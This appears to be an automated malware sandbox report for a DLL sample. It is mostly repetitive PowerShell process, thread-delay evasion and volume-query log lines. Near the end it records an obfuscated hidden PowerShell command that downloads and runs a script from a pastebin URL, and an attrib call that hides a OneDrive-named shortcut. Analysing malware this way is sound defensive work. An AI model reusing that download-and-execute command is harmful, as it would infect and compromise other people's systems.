Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7901
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1812
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7235
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2468
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7035
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2563
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6405
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3119
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 754
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5124
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4593
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 758
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 441
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6009
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3699
Source: C:\Windows\System32\loaddll64.exe TID: 2276 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2156 Thread sleep count: 7901 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2156 Thread sleep count: 1812 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5424 Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5308 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3940 Thread sleep count: 7235 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1656 Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6900 Thread sleep count: 2468 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5388 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3472 Thread sleep time: -15679732462653109s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5864 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2672 Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5696 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 340 Thread sleep count: 754 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7104 Thread sleep count: 161 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7000 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3580 Thread sleep count: 5124 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4976 Thread sleep time: -18446744073709540s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5564 Thread sleep count: 4593 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6596 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2828 Thread sleep count: 758 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4900 Thread sleep count: 441 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1220 Thread sleep count: 172 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2672 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5256 Thread sleep count: 6009 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7172 Thread sleep count: 36 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7172 Thread sleep time: -33204139332677172s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7184 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5256 Thread sleep count: 3699 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\loaddll64.exe Thread delayed: delay time: 120000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: powershell.exe, 00000008.00000002.3037122207.00000242CC5C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllm
Source: powershell.exe, 0000000D.00000002.2517245546.00000278B44C9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
Source: powershell.exe, 00000006.00000002.3066565736.00000276F9F09000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3038134380.000002271A470000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3196743622.00000223CF87E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DAEF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HQsitBLlOv.dll",#1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft OneDrive\FileSync VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
MITRE ATT&CK matrix (one column per tactic; the number in front of a technique is the count shown beside it in the report):

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
